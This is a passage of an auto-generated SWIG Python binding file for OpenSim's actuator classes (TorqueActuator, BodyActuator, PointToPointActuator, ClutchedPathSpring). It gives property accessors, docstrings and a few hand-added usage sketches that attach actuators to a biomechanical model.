upd_optimal_force(TorqueActuator self) -> double &
Parameters
----------
self: OpenSim::TorqueActuator *
"""
return _actuators.TorqueActuator_upd_optimal_force(self, *args)
def set_optimal_force(self, *args):
"""
set_optimal_force(TorqueActuator self, int i, double const & value)
Parameters
----------
i: int
value: double const &
set_optimal_force(TorqueActuator self, double const & value)
Parameters
----------
value: double const &
"""
return _actuators.TorqueActuator_set_optimal_force(self, *args)
def __init__(self, *args):
"""
__init__(OpenSim::TorqueActuator self) -> TorqueActuator
__init__(OpenSim::TorqueActuator self, PhysicalFrame bodyA, PhysicalFrame bodyB, Vec3 axis, bool axisInGround=True) -> TorqueActuator
Parameters
----------
bodyA: OpenSim::PhysicalFrame const &
bodyB: OpenSim::PhysicalFrame const &
axis: SimTK::Vec3 const &
axisInGround: bool
__init__(OpenSim::TorqueActuator self, PhysicalFrame bodyA, PhysicalFrame bodyB, Vec3 axis) -> TorqueActuator
Parameters
----------
bodyA: OpenSim::PhysicalFrame const &
bodyB: OpenSim::PhysicalFrame const &
axis: SimTK::Vec3 const &
"""
this = _actuators.new_TorqueActuator(*args)
try:
self.this.append(this)
except __builtin__.Exception:
self.this = this
def setAxis(self, axis):
"""
setAxis(TorqueActuator self, Vec3 axis)
Parameters
----------
axis: SimTK::Vec3 const &
"""
return _actuators.TorqueActuator_setAxis(self, axis)
def getAxis(self):
"""
getAxis(TorqueActuator self) -> Vec3
Parameters
----------
self: OpenSim::TorqueActuator const *
"""
return _actuators.TorqueActuator_getAxis(self)
def setTorqueIsGlobal(self, isGlobal):
"""
setTorqueIsGlobal(TorqueActuator self, bool isGlobal)
Parameters
----------
isGlobal: bool
"""
return _actuators.TorqueActuator_setTorqueIsGlobal(self, isGlobal)
def getTorqueIsGlobal(self):
"""
getTorqueIsGlobal(TorqueActuator self) -> bool
Parameters
----------
self: OpenSim::TorqueActuator const *
"""
return _actuators.TorqueActuator_getTorqueIsGlobal(self)
def setOptimalForce(self, optimalForce):
"""
setOptimalForce(TorqueActuator self, double optimalForce)
Parameters
----------
optimalForce: double
"""
return _actuators.TorqueActuator_setOptimalForce(self, optimalForce)
def getOptimalForce(self):
"""
getOptimalForce(TorqueActuator self) -> double
Parameters
----------
self: OpenSim::TorqueActuator const *
"""
return _actuators.TorqueActuator_getOptimalForce(self)
def setBodyA(self, body):
"""
setBodyA(TorqueActuator self, PhysicalFrame body)
Parameters
----------
body: OpenSim::PhysicalFrame const &
"""
return _actuators.TorqueActuator_setBodyA(self, body)
def setBodyB(self, body):
"""
setBodyB(TorqueActuator self, PhysicalFrame body)
Parameters
----------
body: OpenSim::PhysicalFrame const &
"""
return _actuators.TorqueActuator_setBodyB(self, body)
def getBodyA(self):
"""
getBodyA(TorqueActuator self) -> PhysicalFrame
Parameters
----------
self: OpenSim::TorqueActuator const *
"""
return _actuators.TorqueActuator_getBodyA(self)
def getBodyB(self):
"""
getBodyB(TorqueActuator self) -> PhysicalFrame
Parameters
----------
self: OpenSim::TorqueActuator const *
"""
return _actuators.TorqueActuator_getBodyB(self)
__swig_destroy__ = _actuators.delete_TorqueActuator
__del__ = lambda self: None
TorqueActuator_swigregister = _actuators.TorqueActuator_swigregister
TorqueActuator_swigregister(TorqueActuator)
def TorqueActuator_safeDownCast(obj):
"""
TorqueActuator_safeDownCast(OpenSimObject obj) -> TorqueActuator
Parameters
----------
obj: OpenSim::Object *
"""
return _actuators.TorqueActuator_safeDownCast(obj)
def TorqueActuator_getClassName():
"""TorqueActuator_getClassName() -> std::string const &"""
return _actuators.TorqueActuator_getClassName()
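# --- Illustrative usage sketch (hand-added; not SWIG-generated) -------------
# Apply equal and opposite torques to two frames about the global Z axis.
# The body name 'pelvis' and the numeric values are hypothetical; 'model'
# is assumed to be an opensim.Model whose ground and body set are reachable
# via getGround()/getBodySet().
def _example_torque_actuator(model):
    import opensim
    act = TorqueActuator()
    act.setBodyA(model.getGround())                 # react against ground
    act.setBodyB(model.getBodySet().get('pelvis'))  # hypothetical body name
    act.setAxis(opensim.Vec3(0, 0, 1))              # torque axis
    act.setTorqueIsGlobal(True)                     # axis fixed in ground frame
    act.setOptimalForce(50.0)                       # torque at unit control (N*m)
    model.addForce(act)
    return act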
class BodyActuator(opensim.simulation.Actuator):
"""Proxy of C++ OpenSim::BodyActuator class."""
__swig_setmethods__ = {}
for _s in [opensim.simulation.Actuator]:
__swig_setmethods__.update(getattr(_s, '__swig_setmethods__', {}))
__setattr__ = lambda self, name, value: _swig_setattr(self, BodyActuator, name, value)
__swig_getmethods__ = {}
for _s in [opensim.simulation.Actuator]:
__swig_getmethods__.update(getattr(_s, '__swig_getmethods__', {}))
__getattr__ = lambda self, name: _swig_getattr(self, BodyActuator, name)
__repr__ = _swig_repr
def safeDownCast(obj):
"""
safeDownCast(OpenSimObject obj) -> BodyActuator
Parameters
----------
obj: OpenSim::Object *
"""
return _actuators.BodyActuator_safeDownCast(obj)
safeDownCast = staticmethod(safeDownCast)
def assign(self, aObject):
"""
assign(BodyActuator self, OpenSimObject aObject)
Parameters
----------
aObject: OpenSim::Object &
"""
return _actuators.BodyActuator_assign(self, aObject)
def getClassName():
"""getClassName() -> std::string const &"""
return _actuators.BodyActuator_getClassName()
getClassName = staticmethod(getClassName)
def clone(self):
"""
clone(BodyActuator self) -> BodyActuator
Parameters
----------
self: OpenSim::BodyActuator const *
"""
return _actuators.BodyActuator_clone(self)
def getConcreteClassName(self):
"""
getConcreteClassName(BodyActuator self) -> std::string const &
Parameters
----------
self: OpenSim::BodyActuator const *
"""
return _actuators.BodyActuator_getConcreteClassName(self)
def copyProperty_point(self, source):
"""
copyProperty_point(BodyActuator self, BodyActuator source)
Parameters
----------
source: OpenSim::BodyActuator::Self const &
"""
return _actuators.BodyActuator_copyProperty_point(self, source)
def append_point(self, value):
"""
append_point(BodyActuator self, Vec3 value) -> int
Parameters
----------
value: SimTK::Vec3 const &
"""
return _actuators.BodyActuator_append_point(self, value)
def constructProperty_point(self, initValue):
"""
constructProperty_point(BodyActuator self, Vec3 initValue)
Parameters
----------
initValue: SimTK::Vec3 const &
"""
return _actuators.BodyActuator_constructProperty_point(self, initValue)
def get_point(self, *args):
"""
get_point(BodyActuator self, int i) -> Vec3
Parameters
----------
i: int
get_point(BodyActuator self) -> Vec3
Parameters
----------
self: OpenSim::BodyActuator const *
"""
return _actuators.BodyActuator_get_point(self, *args)
def upd_point(self, *args):
"""
upd_point(BodyActuator self, int i) -> Vec3
Parameters
----------
i: int
upd_point(BodyActuator self) -> Vec3
Parameters
----------
self: OpenSim::BodyActuator *
"""
return _actuators.BodyActuator_upd_point(self, *args)
def set_point(self, *args):
"""
set_point(BodyActuator self, int i, Vec3 value)
Parameters
----------
i: int
value: SimTK::Vec3 const &
set_point(BodyActuator self, Vec3 value)
Parameters
----------
value: SimTK::Vec3 const &
"""
return _actuators.BodyActuator_set_point(self, *args)
def copyProperty_point_is_global(self, source):
"""
copyProperty_point_is_global(BodyActuator self, BodyActuator source)
Parameters
----------
source: OpenSim::BodyActuator::Self const &
"""
return _actuators.BodyActuator_copyProperty_point_is_global(self, source)
def append_point_is_global(self, value):
"""
append_point_is_global(BodyActuator self, bool const & value) -> int
Parameters
----------
value: bool const &
"""
return _actuators.BodyActuator_append_point_is_global(self, value)
def constructProperty_point_is_global(self, initValue):
"""
constructProperty_point_is_global(BodyActuator self, bool const & initValue)
Parameters
----------
initValue: bool const &
"""
return _actuators.BodyActuator_constructProperty_point_is_global(self, initValue)
def get_point_is_global(self, *args):
"""
get_point_is_global(BodyActuator self, int i) -> bool const
Parameters
----------
i: int
get_point_is_global(BodyActuator self) -> bool const &
Parameters
----------
self: OpenSim::BodyActuator const *
"""
return _actuators.BodyActuator_get_point_is_global(self, *args)
def upd_point_is_global(self, *args):
"""
upd_point_is_global(BodyActuator self, int i) -> bool
Parameters
----------
i: int
upd_point_is_global(BodyActuator self) -> bool &
Parameters
----------
self: OpenSim::BodyActuator *
"""
return _actuators.BodyActuator_upd_point_is_global(self, *args)
def set_point_is_global(self, *args):
"""
set_point_is_global(BodyActuator self, int i, bool const & value)
Parameters
----------
i: int
value: bool const &
set_point_is_global(BodyActuator self, bool const & value)
Parameters
----------
value: bool const &
"""
return _actuators.BodyActuator_set_point_is_global(self, *args)
def copyProperty_spatial_force_is_global(self, source):
"""
copyProperty_spatial_force_is_global(BodyActuator self, BodyActuator source)
Parameters
----------
source: OpenSim::BodyActuator::Self const &
"""
return _actuators.BodyActuator_copyProperty_spatial_force_is_global(self, source)
def append_spatial_force_is_global(self, value):
"""
append_spatial_force_is_global(BodyActuator self, bool const & value) -> int
Parameters
----------
value: bool const &
"""
return _actuators.BodyActuator_append_spatial_force_is_global(self, value)
def constructProperty_spatial_force_is_global(self, initValue):
"""
constructProperty_spatial_force_is_global(BodyActuator self, bool const & initValue)
Parameters
----------
initValue: bool const &
"""
return _actuators.BodyActuator_constructProperty_spatial_force_is_global(self, initValue)
def get_spatial_force_is_global(self, *args):
"""
get_spatial_force_is_global(BodyActuator self, int i) -> bool const
Parameters
----------
i: int
get_spatial_force_is_global(BodyActuator self) -> bool const &
Parameters
----------
self: OpenSim::BodyActuator const *
"""
return _actuators.BodyActuator_get_spatial_force_is_global(self, *args)
def upd_spatial_force_is_global(self, *args):
"""
upd_spatial_force_is_global(BodyActuator self, int i) -> bool
Parameters
----------
i: int
upd_spatial_force_is_global(BodyActuator self) -> bool &
Parameters
----------
self: OpenSim::BodyActuator *
"""
return _actuators.BodyActuator_upd_spatial_force_is_global(self, *args)
def set_spatial_force_is_global(self, *args):
"""
set_spatial_force_is_global(BodyActuator self, int i, bool const & value)
Parameters
----------
i: int
value: bool const &
set_spatial_force_is_global(BodyActuator self, bool const & value)
Parameters
----------
value: bool const &
"""
return _actuators.BodyActuator_set_spatial_force_is_global(self, *args)
__swig_setmethods__["PropertyIndex_socket_body"] = _actuators.BodyActuator_PropertyIndex_socket_body_set
__swig_getmethods__["PropertyIndex_socket_body"] = _actuators.BodyActuator_PropertyIndex_socket_body_get
if _newclass:
PropertyIndex_socket_body = _swig_property(_actuators.BodyActuator_PropertyIndex_socket_body_get, _actuators.BodyActuator_PropertyIndex_socket_body_set)
def connectSocket_body(self, object):
"""
connectSocket_body(BodyActuator self, OpenSimObject object)
Parameters
----------
object: OpenSim::Object const &
"""
return _actuators.BodyActuator_connectSocket_body(self, object)
def __init__(self, *args):
"""
__init__(OpenSim::BodyActuator self) -> BodyActuator
__init__(OpenSim::BodyActuator self, Body body, Vec3 point, bool pointIsGlobal=False, bool spatialForceIsGlobal=True) -> BodyActuator
Parameters
----------
body: OpenSim::Body const &
point: SimTK::Vec3 const &
pointIsGlobal: bool
spatialForceIsGlobal: bool
__init__(OpenSim::BodyActuator self, Body body, Vec3 point, bool pointIsGlobal=False) -> BodyActuator
Parameters
----------
body: OpenSim::Body const &
point: SimTK::Vec3 const &
pointIsGlobal: bool
__init__(OpenSim::BodyActuator self, Body body, Vec3 point) -> BodyActuator
Parameters
----------
body: OpenSim::Body const &
point: SimTK::Vec3 const &
__init__(OpenSim::BodyActuator self, Body body) -> BodyActuator
Parameters
----------
body: OpenSim::Body const &
"""
this = _actuators.new_BodyActuator(*args)
try:
self.this.append(this)
except __builtin__.Exception:
self.this = this
def setPoint(self, point):
"""
setPoint(BodyActuator self, Vec3 point)
Parameters
----------
point: SimTK::Vec3 &
"""
return _actuators.BodyActuator_setPoint(self, point)
def getPoint(self):
"""
getPoint(BodyActuator self) -> Vec3
Parameters
----------
self: OpenSim::BodyActuator const *
"""
return _actuators.BodyActuator_getPoint(self)
def setPointForceIsGlobal(self, isGlobal):
"""
setPointForceIsGlobal(BodyActuator self, bool isGlobal)
Parameters
----------
isGlobal: bool
"""
return _actuators.BodyActuator_setPointForceIsGlobal(self, isGlobal)
def getPointIsGlobal(self):
"""
getPointIsGlobal(BodyActuator self) -> bool
Parameters
----------
self: OpenSim::BodyActuator const *
"""
return _actuators.BodyActuator_getPointIsGlobal(self)
def setSpatialForceIsGlobal(self, isGlobal):
"""
setSpatialForceIsGlobal(BodyActuator self, bool isGlobal)
Parameters
----------
isGlobal: bool
"""
return _actuators.BodyActuator_setSpatialForceIsGlobal(self, isGlobal)
def getSpatialForceIsGlobal(self):
"""
getSpatialForceIsGlobal(BodyActuator self) -> bool
Parameters
----------
self: OpenSim::BodyActuator const *
"""
return _actuators.BodyActuator_getSpatialForceIsGlobal(self)
def setBody(self, body):
"""
setBody(BodyActuator self, Body body)
Parameters
----------
body: OpenSim::Body const &
"""
return _actuators.BodyActuator_setBody(self, body)
def getBody(self):
"""
getBody(BodyActuator self) -> Body
Parameters
----------
self: OpenSim::BodyActuator const *
"""
return _actuators.BodyActuator_getBody(self)
def setBodyName(self, name):
"""
setBodyName(BodyActuator self, std::string const & name)
Parameters
----------
name: std::string const &
"""
return _actuators.BodyActuator_setBodyName(self, name)
def getBodyName(self):
"""
getBodyName(BodyActuator self) -> std::string const &
Parameters
----------
self: OpenSim::BodyActuator const *
"""
return _actuators.BodyActuator_getBodyName(self)
__swig_destroy__ = _actuators.delete_BodyActuator
__del__ = lambda self: None
BodyActuator_swigregister = _actuators.BodyActuator_swigregister
BodyActuator_swigregister(BodyActuator)
def BodyActuator_safeDownCast(obj):
"""
BodyActuator_safeDownCast(OpenSimObject obj) -> BodyActuator
Parameters
----------
obj: OpenSim::Object *
"""
return _actuators.BodyActuator_safeDownCast(obj)
def BodyActuator_getClassName():
"""BodyActuator_getClassName() -> std::string const &"""
return _actuators.BodyActuator_getClassName()
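# --- Illustrative usage sketch (hand-added; not SWIG-generated) -------------
# BodyActuator applies a full 6-component spatial force (torque + force) to
# a single body. The body name 'torso' and the frame choices below are
# hypothetical; 'model' is assumed to be an opensim.Model.
def _example_body_actuator(model):
    import opensim
    body = model.getBodySet().get('torso')  # hypothetical body name
    act = BodyActuator(body)
    act.setPoint(opensim.Vec3(0))           # apply at the body origin
    act.setPointForceIsGlobal(False)        # point expressed in the body frame
    act.setSpatialForceIsGlobal(True)       # torque/force expressed in ground
    model.addForce(act)
    return act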
class PointToPointActuator(opensim.simulation.ScalarActuator):
"""Proxy of C++ OpenSim::PointToPointActuator class."""
__swig_setmethods__ = {}
for _s in [opensim.simulation.ScalarActuator]:
__swig_setmethods__.update(getattr(_s, '__swig_setmethods__', {}))
__setattr__ = lambda self, name, value: _swig_setattr(self, PointToPointActuator, name, value)
__swig_getmethods__ = {}
for _s in [opensim.simulation.ScalarActuator]:
__swig_getmethods__.update(getattr(_s, '__swig_getmethods__', {}))
__getattr__ = lambda self, name: _swig_getattr(self, PointToPointActuator, name)
__repr__ = _swig_repr
def safeDownCast(obj):
"""
safeDownCast(OpenSimObject obj) -> PointToPointActuator
Parameters
----------
obj: OpenSim::Object *
"""
return _actuators.PointToPointActuator_safeDownCast(obj)
safeDownCast = staticmethod(safeDownCast)
def assign(self, aObject):
"""
assign(PointToPointActuator self, OpenSimObject aObject)
Parameters
----------
aObject: OpenSim::Object &
"""
return _actuators.PointToPointActuator_assign(self, aObject)
def getClassName():
"""getClassName() -> std::string const &"""
return _actuators.PointToPointActuator_getClassName()
getClassName = staticmethod(getClassName)
def clone(self):
"""
clone(PointToPointActuator self) -> PointToPointActuator
Parameters
----------
self: OpenSim::PointToPointActuator const *
"""
return _actuators.PointToPointActuator_clone(self)
def getConcreteClassName(self):
"""
getConcreteClassName(PointToPointActuator self) -> std::string const &
Parameters
----------
self: OpenSim::PointToPointActuator const *
"""
return _actuators.PointToPointActuator_getConcreteClassName(self)
def copyProperty_bodyA(self, source):
"""
copyProperty_bodyA(PointToPointActuator self, PointToPointActuator source)
Parameters
----------
source: OpenSim::PointToPointActuator::Self const &
"""
return _actuators.PointToPointActuator_copyProperty_bodyA(self, source)
def append_bodyA(self, value):
"""
append_bodyA(PointToPointActuator self, std::string const & value) -> int
Parameters
----------
value: std::string const &
"""
return _actuators.PointToPointActuator_append_bodyA(self, value)
def constructProperty_bodyA(self, *args):
"""
constructProperty_bodyA(PointToPointActuator self)
constructProperty_bodyA(PointToPointActuator self, std::string const & initValue)
Parameters
----------
initValue: std::string const &
"""
return _actuators.PointToPointActuator_constructProperty_bodyA(self, *args)
def get_bodyA(self, *args):
"""
get_bodyA(PointToPointActuator self, int i) -> std::string const
Parameters
----------
i: int
get_bodyA(PointToPointActuator self) -> std::string const &
Parameters
----------
self: OpenSim::PointToPointActuator const *
"""
return _actuators.PointToPointActuator_get_bodyA(self, *args)
def upd_bodyA(self, *args):
"""
upd_bodyA(PointToPointActuator self, int i) -> std::string
Parameters
----------
i: int
upd_bodyA(PointToPointActuator self) -> std::string &
Parameters
----------
self: OpenSim::PointToPointActuator *
"""
return _actuators.PointToPointActuator_upd_bodyA(self, *args)
def set_bodyA(self, *args):
"""
set_bodyA(PointToPointActuator self, int i, std::string const & value)
Parameters
----------
i: int
value: std::string const &
set_bodyA(PointToPointActuator self, std::string const & value)
Parameters
----------
value: std::string const &
"""
return _actuators.PointToPointActuator_set_bodyA(self, *args)
def copyProperty_bodyB(self, source):
"""
copyProperty_bodyB(PointToPointActuator self, PointToPointActuator source)
Parameters
----------
source: OpenSim::PointToPointActuator::Self const &
"""
return _actuators.PointToPointActuator_copyProperty_bodyB(self, source)
def append_bodyB(self, value):
"""
append_bodyB(PointToPointActuator self, std::string const & value) -> int
Parameters
----------
value: std::string const &
"""
return _actuators.PointToPointActuator_append_bodyB(self, value)
def constructProperty_bodyB(self, *args):
"""
constructProperty_bodyB(PointToPointActuator self)
constructProperty_bodyB(PointToPointActuator self, std::string const & initValue)
Parameters
----------
initValue: std::string const &
"""
return _actuators.PointToPointActuator_constructProperty_bodyB(self, *args)
def get_bodyB(self, *args):
"""
get_bodyB(PointToPointActuator self, int i) -> std::string const
Parameters
----------
i: int
get_bodyB(PointToPointActuator self) -> std::string const &
Parameters
----------
self: OpenSim::PointToPointActuator const *
"""
return _actuators.PointToPointActuator_get_bodyB(self, *args)
def upd_bodyB(self, *args):
"""
upd_bodyB(PointToPointActuator self, int i) -> std::string
Parameters
----------
i: int
upd_bodyB(PointToPointActuator self) -> std::string &
Parameters
----------
self: OpenSim::PointToPointActuator *
"""
return _actuators.PointToPointActuator_upd_bodyB(self, *args)
def set_bodyB(self, *args):
"""
set_bodyB(PointToPointActuator self, int i, std::string const & value)
Parameters
----------
i: int
value: std::string const &
set_bodyB(PointToPointActuator self, std::string const & value)
Parameters
----------
value: std::string const &
"""
return _actuators.PointToPointActuator_set_bodyB(self, *args)
def copyProperty_points_are_global(self, source):
"""
copyProperty_points_are_global(PointToPointActuator self, PointToPointActuator source)
Parameters
----------
source: OpenSim::PointToPointActuator::Self const &
"""
return _actuators.PointToPointActuator_copyProperty_points_are_global(self, source)
def append_points_are_global(self, value):
"""
append_points_are_global(PointToPointActuator self, bool const & value) -> int
Parameters
----------
value: bool const &
"""
return _actuators.PointToPointActuator_append_points_are_global(self, value)
def constructProperty_points_are_global(self, initValue):
"""
constructProperty_points_are_global(PointToPointActuator self, bool const & initValue)
Parameters
----------
initValue: bool const &
"""
return _actuators.PointToPointActuator_constructProperty_points_are_global(self, initValue)
def get_points_are_global(self, *args):
"""
get_points_are_global(PointToPointActuator self, int i) -> bool const
Parameters
----------
i: int
get_points_are_global(PointToPointActuator self) -> bool const &
Parameters
----------
self: OpenSim::PointToPointActuator const *
"""
return _actuators.PointToPointActuator_get_points_are_global(self, *args)
def upd_points_are_global(self, *args):
"""
upd_points_are_global(PointToPointActuator self, int i) -> bool
Parameters
----------
i: int
upd_points_are_global(PointToPointActuator self) -> bool &
Parameters
----------
self: OpenSim::PointToPointActuator *
"""
return _actuators.PointToPointActuator_upd_points_are_global(self, *args)
def set_points_are_global(self, *args):
"""
set_points_are_global(PointToPointActuator self, int i, bool const & value)
Parameters
----------
i: int
value: bool const &
set_points_are_global(PointToPointActuator self, bool const & value)
Parameters
----------
value: bool const &
"""
return _actuators.PointToPointActuator_set_points_are_global(self, *args)
def copyProperty_pointA(self, source):
"""
copyProperty_pointA(PointToPointActuator self, PointToPointActuator source)
Parameters
----------
source: OpenSim::PointToPointActuator::Self const &
"""
return _actuators.PointToPointActuator_copyProperty_pointA(self, source)
def append_pointA(self, value):
"""
append_pointA(PointToPointActuator self, Vec3 value) -> int
Parameters
----------
value: SimTK::Vec3 const &
"""
return _actuators.PointToPointActuator_append_pointA(self, value)
def constructProperty_pointA(self, initValue):
"""
constructProperty_pointA(PointToPointActuator self, Vec3 initValue)
Parameters
----------
initValue: SimTK::Vec3 const &
"""
return _actuators.PointToPointActuator_constructProperty_pointA(self, initValue)
def get_pointA(self, *args):
"""
get_pointA(PointToPointActuator self, int i) -> Vec3
Parameters
----------
i: int
get_pointA(PointToPointActuator self) -> Vec3
Parameters
----------
self: OpenSim::PointToPointActuator const *
"""
return _actuators.PointToPointActuator_get_pointA(self, *args)
def upd_pointA(self, *args):
"""
upd_pointA(PointToPointActuator self, int i) -> Vec3
Parameters
----------
i: int
upd_pointA(PointToPointActuator self) -> Vec3
Parameters
----------
self: OpenSim::PointToPointActuator *
"""
return _actuators.PointToPointActuator_upd_pointA(self, *args)
def set_pointA(self, *args):
"""
set_pointA(PointToPointActuator self, int i, Vec3 value)
Parameters
----------
i: int
value: SimTK::Vec3 const &
set_pointA(PointToPointActuator self, Vec3 value)
Parameters
----------
value: SimTK::Vec3 const &
"""
return _actuators.PointToPointActuator_set_pointA(self, *args)
def copyProperty_pointB(self, source):
"""
copyProperty_pointB(PointToPointActuator self, PointToPointActuator source)
Parameters
----------
source: OpenSim::PointToPointActuator::Self const &
"""
return _actuators.PointToPointActuator_copyProperty_pointB(self, source)
def append_pointB(self, value):
"""
append_pointB(PointToPointActuator self, Vec3 value) -> int
Parameters
----------
value: SimTK::Vec3 const &
"""
return _actuators.PointToPointActuator_append_pointB(self, value)
def constructProperty_pointB(self, initValue):
"""
constructProperty_pointB(PointToPointActuator self, Vec3 initValue)
Parameters
----------
initValue: SimTK::Vec3 const &
"""
return _actuators.PointToPointActuator_constructProperty_pointB(self, initValue)
def get_pointB(self, *args):
"""
get_pointB(PointToPointActuator self, int i) -> Vec3
Parameters
----------
i: int
get_pointB(PointToPointActuator self) -> Vec3
Parameters
----------
self: OpenSim::PointToPointActuator const *
"""
return _actuators.PointToPointActuator_get_pointB(self, *args)
def upd_pointB(self, *args):
"""
upd_pointB(PointToPointActuator self, int i) -> Vec3
Parameters
----------
i: int
upd_pointB(PointToPointActuator self) -> Vec3
Parameters
----------
self: OpenSim::PointToPointActuator *
"""
return _actuators.PointToPointActuator_upd_pointB(self, *args)
def set_pointB(self, *args):
"""
set_pointB(PointToPointActuator self, int i, Vec3 value)
Parameters
----------
i: int
value: SimTK::Vec3 const &
set_pointB(PointToPointActuator self, Vec3 value)
Parameters
----------
value: SimTK::Vec3 const &
"""
return _actuators.PointToPointActuator_set_pointB(self, *args)
def copyProperty_optimal_force(self, source):
"""
copyProperty_optimal_force(PointToPointActuator self, PointToPointActuator source)
Parameters
----------
source: OpenSim::PointToPointActuator::Self const &
"""
return _actuators.PointToPointActuator_copyProperty_optimal_force(self, source)
def append_optimal_force(self, value):
"""
append_optimal_force(PointToPointActuator self, double const & value) -> int
Parameters
----------
value: double const &
"""
return _actuators.PointToPointActuator_append_optimal_force(self, value)
def constructProperty_optimal_force(self, initValue):
"""
constructProperty_optimal_force(PointToPointActuator self, double const & initValue)
Parameters
----------
initValue: double const &
"""
return _actuators.PointToPointActuator_constructProperty_optimal_force(self, initValue)
def get_optimal_force(self, *args):
"""
get_optimal_force(PointToPointActuator self, int i) -> double const
Parameters
----------
i: int
get_optimal_force(PointToPointActuator self) -> double const &
Parameters
----------
self: OpenSim::PointToPointActuator const *
"""
return _actuators.PointToPointActuator_get_optimal_force(self, *args)
def upd_optimal_force(self, *args):
"""
upd_optimal_force(PointToPointActuator self, int i) -> double
Parameters
----------
i: int
upd_optimal_force(PointToPointActuator self) -> double &
Parameters
----------
self: OpenSim::PointToPointActuator *
"""
return _actuators.PointToPointActuator_upd_optimal_force(self, *args)
def set_optimal_force(self, *args):
"""
set_optimal_force(PointToPointActuator self, int i, double const & value)
Parameters
----------
i: int
value: double const &
set_optimal_force(PointToPointActuator self, double const & value)
Parameters
----------
value: double const &
"""
return _actuators.PointToPointActuator_set_optimal_force(self, *args)
def __init__(self, *args):
"""
__init__(OpenSim::PointToPointActuator self) -> PointToPointActuator
__init__(OpenSim::PointToPointActuator self, std::string const & bodyNameA, std::string const & bodyNameB) -> PointToPointActuator
Parameters
----------
bodyNameA: std::string const &
bodyNameB: std::string const &
"""
this = _actuators.new_PointToPointActuator(*args)
try:
self.this.append(this)
except __builtin__.Exception:
self.this = this
def setPointA(self, pointAPos):
"""
setPointA(PointToPointActuator self, Vec3 pointAPos)
Parameters
----------
pointAPos: SimTK::Vec3 const &
"""
return _actuators.PointToPointActuator_setPointA(self, pointAPos)
def getPointA(self):
"""
getPointA(PointToPointActuator self) -> Vec3
Parameters
----------
self: OpenSim::PointToPointActuator const *
"""
return _actuators.PointToPointActuator_getPointA(self)
def setPointB(self, pointBPos):
"""
setPointB(PointToPointActuator self, Vec3 pointBPos)
Parameters
----------
pointBPos: SimTK::Vec3 const &
"""
return _actuators.PointToPointActuator_setPointB(self, pointBPos)
def getPointB(self):
"""
getPointB(PointToPointActuator self) -> Vec3
Parameters
----------
self: OpenSim::PointToPointActuator const *
"""
return _actuators.PointToPointActuator_getPointB(self)
def setPointsAreGlobal(self, isGlobal):
"""
setPointsAreGlobal(PointToPointActuator self, bool isGlobal)
Parameters
----------
isGlobal: bool
"""
return _actuators.PointToPointActuator_setPointsAreGlobal(self, isGlobal)
def getPointsAreGlobal(self):
"""
getPointsAreGlobal(PointToPointActuator self) -> bool
Parameters
----------
self: OpenSim::PointToPointActuator const *
"""
return _actuators.PointToPointActuator_getPointsAreGlobal(self)
def setOptimalForce(self, optimalForce):
"""
setOptimalForce(PointToPointActuator self, double optimalForce)
Parameters
----------
optimalForce: double
"""
return _actuators.PointToPointActuator_setOptimalForce(self, optimalForce)
def getOptimalForce(self):
"""
getOptimalForce(PointToPointActuator self) -> double
Parameters
----------
self: OpenSim::PointToPointActuator const *
"""
return _actuators.PointToPointActuator_getOptimalForce(self)
__swig_destroy__ = _actuators.delete_PointToPointActuator
__del__ = lambda self: None
PointToPointActuator_swigregister = _actuators.PointToPointActuator_swigregister
PointToPointActuator_swigregister(PointToPointActuator)
def PointToPointActuator_safeDownCast(obj):
"""
PointToPointActuator_safeDownCast(OpenSimObject obj) -> PointToPointActuator
Parameters
----------
obj: OpenSim::Object *
"""
return _actuators.PointToPointActuator_safeDownCast(obj)
def PointToPointActuator_getClassName():
"""PointToPointActuator_getClassName() -> std::string const &"""
return _actuators.PointToPointActuator_getClassName()
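# --- Illustrative usage sketch (hand-added; not SWIG-generated) -------------
# PointToPointActuator exerts equal and opposite forces on two points, one
# on each of two bodies, along the line connecting them. The body names
# 'femur_r'/'tibia_r' and all numeric values are hypothetical.
def _example_point_to_point_actuator(model):
    import opensim
    act = PointToPointActuator('femur_r', 'tibia_r')  # bodyA, bodyB by name
    act.setPointA(opensim.Vec3(0, -0.05, 0))  # point on bodyA (body frame)
    act.setPointB(opensim.Vec3(0, 0.05, 0))   # point on bodyB (body frame)
    act.setPointsAreGlobal(False)             # points expressed in body frames
    act.setOptimalForce(200.0)                # force at unit control (N)
    model.addForce(act)
    return act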
class ClutchedPathSpring(opensim.simulation.PathActuator):
"""Proxy of C++ OpenSim::ClutchedPathSpring class."""
__swig_setmethods__ = {}
for _s in [opensim.simulation.PathActuator]:
__swig_setmethods__.update(getattr(_s, '__swig_setmethods__', {}))
__setattr__ = lambda self, name, value: _swig_setattr(self, ClutchedPathSpring, name, value)
__swig_getmethods__ = {}
for _s in [opensim.simulation.PathActuator]:
__swig_getmethods__.update(getattr(_s, '__swig_getmethods__', {}))
__getattr__ = lambda self, name: _swig_getattr(self, ClutchedPathSpring, name)
__repr__ = _swig_repr
def safeDownCast(obj):
"""
safeDownCast(OpenSimObject obj) -> ClutchedPathSpring
Parameters
----------
obj: OpenSim::Object *
"""
return _actuators.ClutchedPathSpring_safeDownCast(obj)
safeDownCast = staticmethod(safeDownCast)
def assign(self, aObject):
"""
assign(ClutchedPathSpring self, OpenSimObject aObject)
Parameters
----------
aObject: OpenSim::Object &
"""
return _actuators.ClutchedPathSpring_assign(self, aObject)
def getClassName():
"""getClassName() -> std::string const &"""
return _actuators.ClutchedPathSpring_getClassName()
getClassName = staticmethod(getClassName)
def clone(self):
"""
clone(ClutchedPathSpring self) -> ClutchedPathSpring
Parameters
----------
self: OpenSim::ClutchedPathSpring const *
"""
return _actuators.ClutchedPathSpring_clone(self)
def getConcreteClassName(self):
"""
getConcreteClassName(ClutchedPathSpring self) -> std::string const &
Parameters
----------
self: OpenSim::ClutchedPathSpring const *
"""
return _actuators.ClutchedPathSpring_getConcreteClassName(self)
def copyProperty_stiffness(self, source):
"""
copyProperty_stiffness(ClutchedPathSpring self, ClutchedPathSpring source)
Parameters
----------
source: OpenSim::ClutchedPathSpring::Self const &
"""
return _actuators.ClutchedPathSpring_copyProperty_stiffness(self, source)
def append_stiffness(self, value):
"""
append_stiffness(ClutchedPathSpring self, double const & value) -> int
Parameters
----------
value: double const &
"""
return _actuators.ClutchedPathSpring_append_stiffness(self, value)
def constructProperty_stiffness(self, initValue):
"""
constructProperty_stiffness(ClutchedPathSpring self, double const & initValue)
Parameters
----------
initValue: double const &
"""
return _actuators.ClutchedPathSpring_constructProperty_stiffness(self, initValue)
def get_stiffness(self, *args):
"""
get_stiffness(ClutchedPathSpring self, int i) -> double const
Parameters
----------
i: int
get_stiffness(ClutchedPathSpring self) -> double const &
Parameters
